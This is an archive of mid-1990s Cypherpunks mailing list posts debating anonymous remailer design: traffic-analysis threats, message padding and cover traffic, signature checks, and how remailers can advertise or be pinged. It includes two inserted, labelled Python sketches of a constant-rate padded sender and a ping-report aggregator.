encryption of outgoing mail. Subways and MixMaster both appear to have far
more working required to implement, far more cooperation between remailers,
and far more room for failure than my idea.  (Emphasis: appear.  I've not
seen Lance's paper, yet.  He's getting it to me.)
 
I also believe that hacking PGP is a bad thing (tm), because it means that
every time an upgrade comes out, it will need to be re-hacked, and once you
start hacking, when do you stop?  Although, it would be nice to have a
STD_LEN variable for such things.
 
 
OTOH, you seem to be agreeing with me here.  Who hacks PGP?  Who is PGPing
their outgoing stuff?  Don't we have to have standard packet _inside_ the
net?  And you achieve this by using PGP?  ?????
 
 
>I still don't quite follow this.  Exactly what attack would be possible
>against Miron's remailer if it allowed encrypted reply blocks (as all
>others do) which would fail if the messages were wrapped as you suggest?
 
The most obvious one: Eve checks messages (in vs out) for matching tails.
If the tails match, the messages match.  The only way around this is for
the entire message to be wrapped.  Thus, the extropian requirement.  
 
 
When I say that the Mark I remailers are laughably easy to crack, I mean
laughably easy.
 
Is the message a clear set of ::Request-Remail-To:?  Pull & log.
Is the message clear, with encrypted headers?  Match, pull, and log.
Is the message encrypted separately from the headers?  Match, pull, log.
Is the whole message encrypted?  Take the ones that are left, match the
largest.  Match the next largest.  Match the next largest. Pull & log.
 
Get stuck?  Need a hint?  Resend a message.  Watch for the repeat on the
out.
 
Laugh.
 
 
The only reason that our systems are actually able to do any good is that
our threat model _is not_ an LEA--with government resources, and government
patience.
 
 
>Alice may not have a key she wants the general public to use - she may
>just be using one for her private correspondents.  
 
If she wants to be able to receive untraceable mail, she is going to have
to have a key that remailers can use when forwarding mail to her.  See
below.
 
>                                                  Actually it seems to
>me given the nature of remailing that it would be superior if it were
>easy for people to "spoof" my use of the remailer.  That would give me
>more credence to claim innocence.  The more useless return addresses are,
>the less we even need remailers.
 
I think you are arguing to ignorance here.  The assumption so far on the
list has been that if Alice is root, she is in the best possible position to
protect herself.  I disagree.
 
Alice has been hauled into court.  The Feds claim that she is the one that
actually sent messages M1,...Mx to Bob through Chaum, even though these
messages have varied From: (and From) lines.  As root, she cannot claim
that this is not possible.  OTOH, if Chaum requires a match, the Feds would
have to claim that she compromised the secret keys of all the
corresponding From: addresses.  Much tougher.
 
 
>It's not my job to fix the damn Internet.  So what if I get mail claiming
>to be from abc when it's actually from def?  I of all people care the
>least, specifically because I throw away this data.  Virtually everyone
>else on the net cares where their mail comes from, but I don't.  My whole
>purpose is to discard the information about where it comes from.  That is
>why I am so confused about your emphasis on checking signatures.
 
We care because we are good people.  ;-)
 
Seriously, if a site is being shadowed, then it is insecure.  It is to our
advantage to know this.  You are right that we "don't care" where a message
comes from only if we assume that the message _didn't_ come from an LEA.
(Or a big corporation.  Some of them probably have the power to do this,
too.)  If it did, then the remailer net is under attack, and we most
definitely _do_ care about that.
 
 
>Although I agree with Wei Dai's mathematics, to my mind it points up the
>importance of successful countermeasures rather than implying that the
>remailer network is inherently insecure.  For example, if you send one
>identical message every batch, Wei's math shows clearly that you can't be
>traced.  Let's not get rumors started about how the remailers don't
>work.
 
I'm lost here.  I thought that sending an identical message (producing
identical output) every tick would be the equivalent to an attack.
 
But what exactly constitutes "successful countermeasures"?  How do you
prevent an attacker from taking over a site, thus compromising it, w/o
the knowledge of the operator?  How do you prevent long/short matching of
the remailer net _as a whole_?  How do you prevent tail matching?  How do
you prevent middle matching, for that matter?  How do you prevent the
repeated message attack?
 
 
>Do you see your suggestion as protecting against Wei's in/out correlation
>attack?  
 
Yes!  Well, not by itself.  My suggestions about "rational use of garbage"
do that.  If Bob receives x messages each tick, 0 to x of which are real,
Eve is hosed--if all messages are standard sized & encrypted!  Eve is even
more hosed if the x messages are concatenated & superencrypted.  If Alice
sends y messages each tick, Eve is hosed.  Even more so if the messages are
concatenated & superencrypted.
 
>        I don't see it.  If fixed-sized packets are used, with chained
>encryption, I think you have as good a system as you do with all of your
>inter-node encryption and signing.
>
 
The way you suggest to standardize packet sizes leaves the system
vulnerable to matching the top of the body of the messages in a repeated-
message attack.
 
>Suppose one good encrypted message enters the net with 10 unencrypted
>ones.  Won't the full path of each of the 10 be visible to an outsider?
>Even if the remailer helps out those 10 doltish users by encrypting them
>from there on out, the outsider already saw their whole paths!  They will
>know how many unencrypted messages are going out to each destination, and
>from that determine where the encrypted message is going.
 
Not with rational use of garbage.  With rational use of garbage, the system
could protect a single encrypted message--if the recipient or sender is "in
the box".  BTW, it may be impractical for senders to be "in the box", as
described, as they cannot know exactly when ticks occur.  I believe it can
be done, though.
 
>Of course it was Chaum himself in his 1981 paper (which I think is available
>from the CP FTP site) who described the duplicate-message attack.  I don't
>see that inter-remailing encryption helps much, because the attacker can
>still notice that whenever they inject message A, _something_ goes to
>Bob.  The real solution, as Chaum pointed out, is that the remailer must
>reject duplicate messages, even when separated by days.  Doing this without
>keeping a database of all messages ever sent is left as an exercise.
>
 
I disagree.  If identical input to Chaum does not produce identical output
to Bob, how does Eve correlate them?  Repeating, she can match the top of
the body of messages, so random tails reveal the actual encrypted message,
for whatever that is worth.
 
And if Bob receives x packets per tick, or a BIG packet every tick, how does
Eve trace it?
 
 
>Another aspect worth mentioning is that message splitting can make the
>kinds of statistical correlations that Wei Dai was looking at more of
>a danger. 
 
More than being the ONLY file in the net of your (approximate) size?
 
>          It's one thing if I send a message along with thousands of
>other people, and Bob gets a message along with everyone else.  But if I
>send 10 messages and Bob gets 10 from that batch, that fact alone can
>help to link us up.  So splitting my big message into 10 standard ones
>isn't that great if they're all sent at once.  Ideally you'd want to
>dribble them out at some standard rate, a rate at which you always send
>a message whether you have something to send or not.  But this may introduce
>unacceptable latency.
 
"Dribble them out at some standard rate".  Yes.  y packets per tick.  Set y
equal to your average number of real packets per tick, plus 3 standard
deviations.  Since you are chaining, the latency of your input will be less
than the latency of the remailernet.
 
Nathan
 
"PGP?"                        "ITAR!"                          "Oh, RKBA!"
 
 
                   |--------------------------------------------------+
  ----------------- 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.com> )
 |44B3D866 3D551E2E ---------------------------------------------------
 |F89222A6 338CDE24/ |
  -----------------
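
An added example, not part of the original message: a sketch of the "y packets per tick" rule above, with y set to the mean plus three standard deviations and idle slots filled with dummies. The packet size, the 4-byte length header, and the traffic history are assumptions made for the example; a real sender would also encrypt every packet so that dummies and real packets look alike on the wire.

```python
import math
import os
import statistics
from collections import deque

PACKET_SIZE = 1024   # standard packet size in bytes (assumed value)
HEADER = 4           # length prefix: number of real bytes in this packet


def packets_per_tick(history):
    """y = mean real packets per tick + 3 standard deviations, at least 1.

    Uses the population standard deviation; the message does not say which.
    """
    mean = statistics.mean(history)
    sd = statistics.pstdev(history)
    return max(1, math.ceil(mean + 3 * sd))


def split_message(payload):
    """Cut a payload into PACKET_SIZE packets; the last one is padded."""
    body = PACKET_SIZE - HEADER
    packets = []
    for i in range(0, len(payload), body):
        part = payload[i:i + body]
        pad = os.urandom(body - len(part))
        packets.append(len(part).to_bytes(HEADER, "big") + part + pad)
    return packets


def dummy_packet():
    """Cover traffic: zero real bytes, random filler, same size as real ones."""
    return (0).to_bytes(HEADER, "big") + os.urandom(PACKET_SIZE - HEADER)


def reassemble(packets):
    """Receiver side: drop dummies and padding, rejoin real bytes in order."""
    out = bytearray()
    for p in packets:
        n = int.from_bytes(p[:HEADER], "big")
        out += p[HEADER:HEADER + n]
    return bytes(out)


class ConstantRateSender:
    """Emits exactly y packets every tick: queued real ones first, then dummies."""

    def __init__(self, y):
        self.y = y
        self.queue = deque()

    def submit(self, payload):
        self.queue.extend(split_message(payload))

    def ticks_to_drain(self):
        """Latency cost: ticks needed before everything queued has left."""
        return math.ceil(len(self.queue) / self.y)

    def tick(self):
        return [self.queue.popleft() if self.queue else dummy_packet()
                for _ in range(self.y)]


def demo():
    history = [0, 1, 0, 0, 2, 0, 1, 0]    # constructed: real packets in past ticks
    sender = ConstantRateSender(packets_per_tick(history))
    counts = [len(sender.tick())]          # idle tick: all dummies
    sender.submit(b"short note")
    sender.submit(bytes(500 * 1024))       # constructed 500 KB payload
    wait = sender.ticks_to_drain()
    received = []
    for _ in range(wait + 1):              # one extra tick past the drain point
        batch = sender.tick()
        counts.append(len(batch))
        received.extend(batch)
    sizes = {len(p) for p in received}
    return sender.y, wait, set(counts), sizes, reassemble(received)


if __name__ == "__main__":
    y, wait, counts, sizes, data = demo()
    print(f"y={y} packets/tick, large message drains in {wait} ticks")
    print(f"observed batch sizes {counts}, packet sizes {sizes}")
```

An observer sees the same number of same-sized packets every tick whether or not anything real is queued; the price is the drain time that `ticks_to_drain` reports.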
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 1 Feb 95 17:00:02 PST
To: cypherpunks@toad.com
Subject: Ending the Crusade
Message-ID: <Pine.3.89.9502011825.C8923-0100000@jake.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is an idea to tone down the dos crusade for those of you with procmail
and a vindictive streak:  Instead of routing all of those messages to
/dev/null, forward them back to the authors, perhaps with a notice that the
message appears to have been mistakenly routed to you?
 
Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 1 Feb 95 17:00:35 PST
To: cypherpunks@toad.com
Subject: Thanks for not flaming  !??!?
Message-ID: <Pine.3.89.9502011858.D8923-0100000@jake.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@bwh.harvard.edu>
 
>You're right, I did miss the attack.  I'll be responding in depth
>tomorrow, when I'm awake, but I wanted to say thanks for not flaming.
>:)
>
>Adam
 
Is it just me, or does this message have a rather disturbing social
implication?  Crimeny, no one's perfect around here.  Well, maybe James or
Perry.
 
Nathan
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Todd Masco)
Date: Wed, 1 Feb 95 16:29:32 PST
To: cypherpunks@toad.com
Subject: Re: Fundamental Question?
Message-ID: <199502020025.TAA15949@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9502012323.AA00271@toad.com>,  <kevin@elvis.wicat.com> wrote:
>Consider the incoming directory on my local news host:
...
Strictly speaking, you've really only demonstrated
that there are a lot of poorly connected sites on the USENET.  The
primary characteristic that really needs to be considered is the time
for news to reach one remailer site from another.

My experience is that news propagation is fast enough that close to
real-time conversations happen all the time.  I take part in them on
the newsgroups I still read and observe them all the time.

I don't have a ready explanation for why my experience differs so much
from yours.  The worst-connected site I've ever read from was 9 mo.s ago
with a batched feed from uunet.  Even then the vast majority of posts I
saw were from the day just ending.

What are other people seeing as news delays?
- --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzAmeSoZzwIn1bdtAQHHiwGAxL13i5YYjZxREU1XwnAp81+XWgir7H92
enbDeqFQwjddTeEgHX+fKZWoZJBe4wy6
=pmE5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Wed, 1 Feb 95 16:53:34 PST
To: danisch@ira.uka.de (Hadmut Danisch)
Subject: Re: PGP Question
In-Reply-To: <9502011343.AA00578@elysion.iaks.ira.uka.de>
Message-ID: <199502020053.TAA06783@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> Is there any simple way to glue a binary file and its detached pgp
> signature together into a single pgp file (as produced by non-detached
> signing) ?

Uhh, this would sort of defeat the purpose of a detached signature; in
which case why not use the regular signature??  Alternatively, you
could use MIME multiparts to encode the binary file (in one part) and
the signature (in another part) in a single message.  Is this what
you want???

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Todd Masco)
Date: Wed, 1 Feb 95 17:03:28 PST
To: cypherpunks@toad.com
Subject: Re: Frothing remailers - an immodest proposal
Message-ID: <199502020059.TAA16283@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <9502020017.AA00895@toad.com>,  <kevin@elvis.wicat.com> wrote:
>>1.  Broadcasting every couple of minutes isn't necessary and is undesirable

>True, but this has two basic assumptions that I disagree with: first,
>that we can guarantee delivery of a broadcast message to all interested
>sites; 

I had the USENET model of propagation in mind when I wrote this.  Delivery
is considerably better assured with such a store-and-forward over

>and second, that remailers never go down for unexpected reasons.

True, if you append "for extended periods of time."  The key detail is the
boundary condition: IE, how long does it take a "downed" remailer to come
off the web.  Since each site has the best idea of their own stability,
they are in the best position to set the time-out period.  A very flaky
site might set a time-out to 6 hours.  I'd suggest that a site flakier
than that shouldn't be running a remailer.

>>2.  This is actually unnecessary for your situation: All you need to do is
>>advertise your location as a "real" remailer and then have a cron job that
>>kill sendmail at 5pm on your remailer machine

>But, if my understanding of remailer operation is correct, this has two
>potential problems: first, I will still receive mail during the day,
>causing a bandwidth concern (I know, it's probably not a problem right
>now, particularly since users will probably choose to avoid a remailer
>with a possible 16 hour delay);

No, not at all.  The attempted connections to your sendmail will fail and
the mail will attempt redelivery for some period of time (usually 3 days)
at a certain interval (usually 30min. - 1 hour).

>And even if I try to be nice
>when the mailer goes down permanently and tell everyone not to route
>mail through it any more, that news still has to travel via word of
>mouth to all users of the web.

Sure.  It's important to note that you've got two separable problems to
address here: 1) a recurring limited window of up-time, and 2) handling
permanent down-times.

My suggestion only covers the first.  The USENET model I'm pushing is
designed to cover the second.

>[PGP web-of-trust] strikes me as critical;...
>Given an extended web of trust between remailers, the user can
>choose to trust one remailer (I have no idea how to make this process
>more palatable) and immediately gain the security of a large web of
>remailers. 

Absolutely, that's what I was trying to express.

Best regards,
- - --
Todd Masco     | "Let me get this straight.  You're making a crypto toolkit,
cactus@hks.net |  and you're worried about it being _obscure_?" - Eric Hughes
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLy/1gRNhgovrPB7dAQGZCQQA47ADvvuXRvlq5Qw3MSZaUJqqk2KJbUKk
nV1mnTVIbvBbCt5PczoSFKkO/O6wMfS/4zzkoTqpvpIvwYvZ6ds75yBwhIyxvTvx
gygKFi5ZwysYGz/49vs0BdJSHMqUA+/HVHE2zfcYP+yvbnbTdryQJXLrOdlGhH3a
R0LvGJVgCSw=
=k+vP
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzAuayoZzwIn1bdtAQFa4gF8Cl9yuHttaTqmcy9Be+9EWa4qp3zHCP5n
pgWiNvOt7reobq42ZluxFgTlWrFG0SKa
=oFTV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Wed, 1 Feb 95 18:21:10 PST
To: Nathan Zook <nzook@bga.com>
Subject: Re: Ending the Crusade
In-Reply-To: <Pine.3.89.9502011825.C8923-0100000@jake.bga.com>
Message-ID: <9502020220.AA18342@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Wed, 1 Feb 1995 18:59:54 -0600 (CST)
    From: Nathan Zook <nzook@bga.com>
    
    Instead of routing all of those messages to /dev/null, forward
    them back to the authors, perhaps with a notice that the message
    appears to have been mistakenly routed to you?

And then all LD has to do to have lots-o-fun is to send you a whole
bunch of "your OS sucks" messages with the From: line set to
alt.religion.scientology@some.mail2news.site . . . .

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 1 Feb 95 18:19:09 PST
To: cypherpunks@toad.com
Subject: Frothing remailers, the advertising and pinging problems
Message-ID: <ab55e6d7010210043e93@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:50 PM 02/01/95, kevin@elvis.wicat.com wrote:
>I am not happy with my proposed advertising methods, and was quietly
>hoping for some guidance from internet gurus in this point (the irc
>suggestion in particular is a pretty shaky straw man). However, see my
>earlier message (on some other thread) about Usenet propagation times.
>Propagation times in days do not seem to be rare (post to misc.test and
>see when the last reply comes back). While this is better than
>word-of-mouth propagation, it does not offer the very low latency I was
>looking for.

I tried to discuss this very issue a few months ago, with little interest.
But I'm glad there's someone to discuss it with now. (read, someone who
will listen when I spout volumes to the list :)   )

Here follows my treatise. :)


We already have a solution, actually.  Raph's remailer list.  If you know
your remailer is going down, tell Raph about it, and he'll remove you from
the list.  [Better would be an automatic way of removing remailers from the
list upon receiving a PGP-signed message from the op, without Raph's
intervention].  Presumably, if your remailer never returns his ping, it
will move to the bottom of his list.  So applications like his "premail",
which use this list, won't send to those remailers.

This is really an excellent solution, and what it doesn't do, could easily
be added to it.  The problem is that it's too centralized. We like
decentralized things hereabouts, and Raph's list requires you to trust Raph
not to lie to you, or withhold information from you. And of course a
centralized solution is more subject to attack too; if someone managed to
subvert Raph's list (either by subverting his data collection methods, or
the report he generates), then an increasingly large portion of the
remailer-using-public is up shit creek.   Single point of failure.

A partial solution is for lots of people to run remailer pinging and
reporting services like Raph's.  Then you could use which ever one you
want, or even write a script to get info from them all and average em
together (throwing out extremely oddball scores, using some sort of
statistical method).  A better solution to the centralization problem would
be for _everyone_ to run their own remailer pinging service.  This solves
the centralization problem, but now when a remailer op knows his remailer
is going down, he can't simply tell Raph, he's got to tell _everyone_,
which is the same problem he had originally.  Also, this is somewhat
realistic.  People have been saying for ages that the remailer net is much
more secure when every user runs their own remailer, but it still hasn't
happened. For obvious reasons.

So we've still got the problem of how users are to tell when remailers go
down.  That's what I see as the basic problem here.   It really divides
into two problems: the "advertising" problem, and the "pinging" problem.
Which actually aren't at all completely separate.

*THE ADVERTISING PROBLEM*

The advertising problem consists of how remailers are to get info out to
the Remailer-Net-At-Large.  I run a remailer, and I know my remailer is
going out of business soon (temporarily, or permanently), and I want to
tell people.  Or, my remailer has returned (or just started
business for the first time), and I want to tell people.

        ++Usenet. Non-IP, but slow. ++
Usenet is an obvious solution, but the latency is too low.   But usenet
does work really nicely, aside from the latency problem. Remailers post
messages to alt.remailer.auto-announce, giving one of a number of
standardized machine-readable messages.  For instance FriendlyRemailer
might post that it's going down, and expects to be down for about 24 hours.
Clients, which could be other remailers, or chaining applications like
premail, would periodically check this newsgroup and keep track of info.
My client software might decide to stop routing through FriendlyRemailer,
and completely ignore the "for 24 hours" thing, and start sending through
there again when it gets an "I'm back" message over the usenet.  Or it
might decide to record the "for 24 hours" thing somewhere for human
reading.  If a new remailer appears and broadcasts "I'm here", it might add
it to the list of useable remailers, or it might ignore it, or it might ask
for human approval of adding it to the list. Whatever the user wants it to
do.

        ++Direct TCP.  IP-required, complicated, but fast.++
But there's still a latency problem.  The only way I can think of to solve
that is with direct TCP connections of some kind.  IRC would be one way.
Remailers could broadcast "I'm here" every 20 seconds on an IRC channel,
and clients could keep an eye on this IRC channel to see what's up.  Of
course, then a client would need to wait up to 20 seconds before sending a
piece of mail, which is kind of a pain. So, instead, you might have a
background program running always, and tabulating data, so it's got data
stored and doesn't need to wait at all. (If the remailer said "I'm here" a
minute ago, that's good enough, don't need to wait another minute for the
next "I'm here").  And then remailers wouldn't need to broadcast as often
as 20 seconds; something like 5 minutes would probably do.  So bandwidth is
more reasonable.  If a remailer goes down, and you send a message to it
within 5 minutes, you are shit out of luck, unfortunately.   The problem
with this solution is that everyone using it needs to be on the internet.
People haven't wanted to exclude UUCP connections and such from
participating in the remailernet (as remailer or client) in the past, and I
think they're probably right.  And IRC might not be that reliable, I don't
know.  And it requires a lot of processing power; remailers have got to be
constantly sending out "I'm here", client programs have to be constantly
running and scanning for this info.  Might not be that scalable either,
when you have 100 remailers broadcasting, and 20,000 users listening. Or
more.

*THE PINGING PROBLEM*

The pinging problem consists of how clients (which could be other
remailers) can query remailers about whether they are up or not. (and what
features the particular remailers support, which is also something that
might be advertised above, incidentally.)  The user is taking the
initiative, as opposed to the remailer.  Because maybe someone subverted
your usenet or IRC or other broadcasting medium, so you don't want to place
too much trust on it, and you want to check it yourself.   And maybe the
"advertising" medium is slow usenet, so the last "I'm here" you got
from a remailer was dated a day ago. Is it still there? You'd like a quick
way of pinging it to see.

Again, we have two solutions: Slower simpler, being-on-the-net unnecessary,
pinging with mail; and Faster, More Complicated, need-to-be-on-the-net TCP.


        ++Mail ping. Non-IP, simple, slow. ++
 A mail ping simply consists of sending a message to a remailer with a
Request-Resending-To: yourself.  When you get it back, you know the
remailer is alive.  This has the advantage that it's hard for the remailer
to trick you, even if it is an evil NSA remailer that wants you to believe
it is alive, even though it really throws messages in the trash.   It can't
differentiate between your "ping" (to be returned), and a normal message
(to be thrown in the trash).  And you can do it with a UUCP connection, or
some other kind of store-and-forward non-IP connection.  The problem is
that it's slow.  Especially with the latency that secure remailers have to
put into the mix.  This could be solved if you could tell the remailer
somehow that this is a ping message which should be sent relatively quickly
and not re-ordered and latency-added like a normal message. Of course, then
you lose the advantage that the remailer can't tell the difference between
a ping and a normal message.

The way to deal with the high latency, would again be to have each client
have a background process running and pinging periodically, and storing
data.  Again, if it's gone down since your last ping, you are out of luck.
And this is kind of complicated, and high-bandwidth.

        ++TCP transaction ping. IP required, complicated, but fast.++
Again, the other alternative is a direct TCP connection. Connect to a
certain port, say "are you there", get an answer.  I believe mixmaster will
soon support direct TCP traffic transactions, it would probably be trivial
to add a "pinging" feature too. Although really unnecessary. If you contact
the host directly, and it answers, you know it's there, you don't need to
ping.  The disadvantage is again that IP is required.


**CONCLUSION**

Advertising and pinging methods are needed.   There should be a way for a
new remailer to announce itself to the net (might not be trusted or used by
software, but it's up to the user), and a way for existing remailers to
announce that they are going down (and announce when they come back up).
There also needs to be a way for a user to "query" a remailer
individually, instead of relying on advertising, _especially_ if the
advertising method is high-latency.

Both the slower store-and-forward (mail, news) techniques, and the faster
direct-socket-connection techniques both have advantages and disadvantages.
Ideally, _all_ of them would exist.  Some remailers might only support
or deal with some of them (out of choice or lack of IP connectivity or
bandwidth), but client software could gather info from all or some of the
pinging and advertising mediums, and make choices about whether to use
remailers, based on how much info it has, and what the info says.

And the issue not even discussed here, is that of having a successful way to
bounce messages.  If all of your advertisment-gathering and pinging fail
anyhow, you should be notified that your message didn't make it through. It
actually seems possible that a successful bounce method would remove the
need for advertising and/or pinging completely.  But a successful bounce
method seems even more remote than successful pinging/advertising methods.
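
An added example, not part of the original message: one way a client could combine reports from several independent pinging services and throw out oddball scores, as the message above suggests. The report format, pinger names, and scores are constructed for the example and are not the format of any real remailer list; the outlier rule (median absolute deviation) is one choice of "some sort of statistical method".

```python
import statistics

# Constructed sample reports, one per independent pinging service.
# Assumed line format for this example: "<remailer> <uptime-percent>"
REPORTS = {
    "pinger-a": "alpha 99\nbravo 90\ndeadmix 0\n",
    "pinger-b": "alpha 98\nbravo 92\ndeadmix 0\n",
    "pinger-c": "alpha 97\nbravo 91\ndeadmix 2\nnewmix 100\n",
    "pinger-d": "alpha 99\nbravo 35\ndeadmix 1\nthis line is malformed\n",
    "pinger-e": "alpha 5\nbravo 93\ndeadmix 100\n",   # subverted or broken
}


def parse_report(text):
    """Parse one pinger's report; skip malformed or out-of-range lines."""
    scores = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue
        name, raw = parts
        try:
            uptime = float(raw)
        except ValueError:
            continue
        if 0.0 <= uptime <= 100.0:
            scores[name] = uptime
    return scores


def robust_filter(samples, k=3.0, min_scale=1.0):
    """Split (pinger, value) samples into kept and dropped.

    A value is dropped when it lies more than k median-absolute-deviations
    from the median. min_scale keeps the limit from collapsing to zero when
    most pingers agree exactly.
    """
    values = [v for _, v in samples]
    med = statistics.median(values)
    mad = statistics.median(abs(v - med) for v in values)
    limit = k * max(mad, min_scale)
    kept = [(p, v) for p, v in samples if abs(v - med) <= limit]
    dropped = [(p, v) for p, v in samples if abs(v - med) > limit]
    return kept, dropped


def aggregate(reports, quorum=3):
    """Return (scores, suspects).

    scores:   remailer -> mean uptime over the pingers that were not outliers
    suspects: pinger -> number of remailers on which it was the odd one out
    Remailers seen by fewer than `quorum` pingers get no score at all, so a
    single service cannot introduce a new remailer on its own word.
    """
    by_remailer = {}
    for pinger, text in reports.items():
        for name, uptime in parse_report(text).items():
            by_remailer.setdefault(name, []).append((pinger, uptime))

    scores, suspects = {}, {}
    for name, samples in by_remailer.items():
        if len(samples) < quorum:
            continue
        kept, dropped = robust_filter(samples)
        scores[name] = statistics.mean(v for _, v in kept)
        for pinger, _ in dropped:
            suspects[pinger] = suspects.get(pinger, 0) + 1
    return scores, suspects


def usable(scores, min_uptime=90.0):
    """Remailers good enough to chain through, best first."""
    good = [n for n, s in scores.items() if s >= min_uptime]
    return sorted(good, key=lambda n: scores[n], reverse=True)


if __name__ == "__main__":
    scores, suspects = aggregate(REPORTS)
    print("scores:  ", scores)
    print("usable:  ", usable(scores))
    print("suspects:", suspects)
```

With five pingers, one lying service can neither bury a working remailer nor promote a dead one, and the `suspects` count shows which service keeps disagreeing with the rest.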






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Wed, 1 Feb 95 20:00:37 PST
To: ortenzi@interactive.net (Anthony Ortenzi)
Subject: Re: Fundamental Question?
In-Reply-To: <Pine.BSI.3.91.950201135326.29214A-100000@ns.interactive.net>
Message-ID: <199502020400.XAA03916@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anthony Ortenzi wrote:
> 
> Although I understand the need for remailers for anonymity, is it not 
> true that the whole idea of encryption (good encryption, that is) is that 
> no matter who gets the encrypted text, it really doesn't matter?  Does 
> this not mean that something like USENET is *perfect* for this?

Well, it's happened in the past. Doesn't mean Usenet is perfect for it,
since nobody wants to sift through several thousand messages a day for
messages encrypted to him/her.  Also, imagine all the traffic sent to a
remailer duplicated on every site that carries that Usenet group...

Rob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 1 Feb 95 23:14:37 PST
To: cypherpunks@toad.com
Subject: Re:  Why encrypt intra-remailernet.
Message-ID: <199502020714.XAA15798@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Nathan Zook <nzook@bga.com>
[ Re: remailers checking signatures on incoming messages ]
> What benefit does Alice gain?
> 1) Plausible deniability.  Remember, "reasonable doubt."  Remember Abscam?
>    The gov't is in a good position to fake source info.  This squishes
>    that.  (It squishes even better if Chaum _requires_ signatures.)

She doesn't get that.  A signature lets her prove that she sent a
message.  It doesn't let her prove she didn't send a message.

> 2) If Chaum sends Alice a copy of the message that failed the signature
>    check, Alice knows that someone is trying to spoof her.  This
>    information may be critical in determining how serious her opponents
>    are.

I don't really understand this threat that Alice may be "spoofed".  Why,
of all places, would her opponents try to spoof her through an anonymous
remailer?  Isn't this kind of like sending mail with no return address,
and pretending it comes from someone else?  This seems terribly subtle.

> What might Chaum gain from checking or requiring signatures?
> Various net abuses often involve faking names.  Requiring validated
> signatures would pressure these abuses away from the remailers.  Reducing
> the net abuses going through the remailers is a PR goal.

This would be a good thing, agreed.  And requiring signatures probably
would weed out a lot of the flakes, largely by raising the threshold of
cluefulness needed to use the network.

> It seems to me that hacking PGP requires considerably more cooperation
> between remailers, and more work than just allowing recursive opening of
> PGP packets, automatic padding (or concatenating) of data, and automatic
> encryption of outgoing mail. Subways and MixMaster both appear to have far
> more working required to implement, far more cooperation between remailers,
> and far more room for failure than my idea.  (Emphasis: appear.  I've not
> seen Lance's paper, yet.  He's getting it to me.)

This is not clear to me.  My hope would be to persuade the PGP developers
(many of whom read this list) to incorporate a pad feature in future
versions so that messages can be easily rounded up to a standard size.
Alternatively the mixmaster client may include this capability.

> OTOH, you seem to be agreeing with me here.  Who hacks PGP?  Who is PGPing
> their outgoing stuff?  Don't we have to have standard packet _inside_ the
> net?  And you achieve this by using PGP?  ?????

I can see the problem with standard packets in a chaining context, that
they would shrink slightly in size as each successive remailer stripped
off its envelope.  Re-encrypting would solve this by providing more
padding.  OTOH you can actually stick padding into a PGP packet if you
know what you're doing.  I have a perl script around somewhere which will
do this.

> >I still don't quite follow this.  Exactly what attack would be possible
> >against Miron's remailer if it allowed encrypted reply blocks (as all
> >others do) which would fail if the messages were wrapped as you suggest?
>  
> The most obvious one: Eve checks messages (in vs out) for matching tails.
> If the tails match, the messages match.  The only way around this is for
> the entire message to be wrapped.  Thus, the extropian requirement.  

It is true that encrypting messages intra-remailer would prevent this
attack as far as that one remailer in the chain is concerned.  But it
seems to me that the message still suffers from this attack against the
remailer network as a whole.  This points up the fundamental problem with
this form of encrypted reply block.  They are really not secure unless
the body itself gets transformed at each step as in Chaum's model.

> When I say that the Mark I remailers are laughably easy to crack, I mean
> laughably easy.

None of this is news.  We have been discussing these attacks for years.
Even with intra-remailer encryption I think these attacks work against
the remailer net.

> Is the message a clear set of ::Request-Remail-To:?  Pull & log.
This will work when the message is heading to the net in the clear, even
if it is encrypted between nodes.

> Is the message clear, with encrypted headers?  Match, pull, and log.
You can still match the message entering and leaving the net, even if it
is encrypted within.

> Is the message encrypted separately from the headers?  Match, pull, log.
As above.

> Is the whole message encrypted?  Take the ones that are left, match the
